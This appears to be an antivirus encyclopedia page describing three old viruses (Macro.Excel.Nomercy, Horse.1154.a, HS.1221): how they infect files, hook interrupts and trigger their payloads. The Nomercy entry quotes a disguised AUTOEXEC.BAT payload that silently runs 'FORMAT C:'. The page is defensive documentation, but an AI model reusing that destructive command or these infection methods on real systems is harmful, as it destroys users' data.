Macro.Excel.Nomercy
Description Macro.Excel.Nomercy
This macro-virus infects Excel worksheets (XLS-files). It contains two modules: Members and NoMercy2. To infect Excel, the virus creates an infected NOMERCY.XLM file in the Excel startup directory (XLStart). The virus contains auto-macro auto_open in its NoMercy2 module, and the auto-macro sets the Fuck macro (infection routine) on OnSheetActivate call. As a result, the virus infects sheets that are activated. The virus detects already infected files by the "NoMercy2" module name. The virus erases all menu items which work with macros. On Monday after 7 a.m., the virus appends to the C:AUTOEXEC.BAT file a command that formats the hard disk: @ECHO OFF CLS ECHO Please wait while setup Updates Your configuration Files ECHO This may take a few minutesall FORMAT C: /U /C /S /AUTOTEST > NUL ECHO Complete !!! ECHO. ECHO. ECHO Result : ECHO All Data Lost!!!
Check other viruses! Be aware! Use Antiviral Software
Horse.1154.a
Description Horse.1154.a
There are not dangerous memory resident parasitic viruses. They hook INT 8, 21h and write themselves to the end of COM and EXE files that are executed or closed. While infecting the viruses use the undocumented System File Table. The viruses trace interrupts, periodically manifest themselves by a sound or the video-effects. They contain the text strings like: Sofia,Jan/Feb 1991 (c) Naughty Hacker. Sofia,Feb '91 Naughty Hacker.
HS.1221
Description HS.1221
This is a dangerous memory resident parasitic virus. It hooks INT 21h and writes itself to the end of COM and EXE files (except AIDSTEST.EXE) that are executed. On December, 27th it hooks INT 17h and prints the messages in Russian. The virus contains the text string: COMSPEC= SNAIDSTESTCOMEXE HS86.42 Ver 4.09.Copyright by EA computers inc.1994
|